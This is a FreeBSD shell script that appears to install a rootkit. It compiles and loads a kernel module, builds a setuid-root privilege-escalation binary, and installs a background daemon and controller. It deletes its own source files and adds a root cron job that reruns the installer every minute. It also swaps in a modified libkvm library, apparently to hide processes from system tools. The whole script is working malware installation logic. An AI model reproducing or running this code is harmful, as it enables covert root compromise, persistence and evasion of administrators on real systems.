#!/bin/sh

if [ ! -e /boot/kernel/rootkit.ko ]; then
	make
	mv rootkit.ko /boot/kernel
	make clean
	rm .depend.rootkit.o
	rm Makefile
fi

if [ ! -e /lib/daemon ]; then
	cc controller.c -o /sbin/controller
	chmod 755 /sbin/controller
	cc priv_esc.c -o /bin/priv_esc
	chmod 755 /bin/priv_esc
	chmod +s /bin/priv_esc
	mv daemon /lib/daemon
	chown root /lib/daemon
fi

if [ ! -e /dev/cd ]; then
	/sbin/kldload /boot/kernel/rootkit.ko
	/lib/daemon $1 &
	/sbin/controller on
	echo "" > /log.txt
	chmod 666 /log.txt
fi

RESULT=`pgrep daemon`

if [ "${RESULT:-null}" = null ]; then
	/lib/daemon $1 &
	/sbin/controller on
	chmod 666 /log.txt
fi

if [ -e rootkit.c ]; then
	rm -f controller.c priv_esc.c rootkit.c rootkit.tar master log remote
fi

if [ ! -e /var/cron/tabs/root ] || [ -s /var/cron/tabs/root ]; then
	echo "SHELL = /bin/sh" > persistence
	echo "* * * * * /etc/install $1" >> persistence
	crontab persistence
	rm persistence
fi

if [ ! -e /etc/install ]; then
	mv install /etc/install
	chown root /etc/install
fi

if [ -e kvm_tmp.c ]; then
	mv kvm_tmp.c /usr/src/lib/libkvm/kvm.c
	cd /usr/src/lib/libkvm/
	make
	mv libkvm.so.7 /lib/libkvm.so.7
	make clean
	rm -f .depend*
fi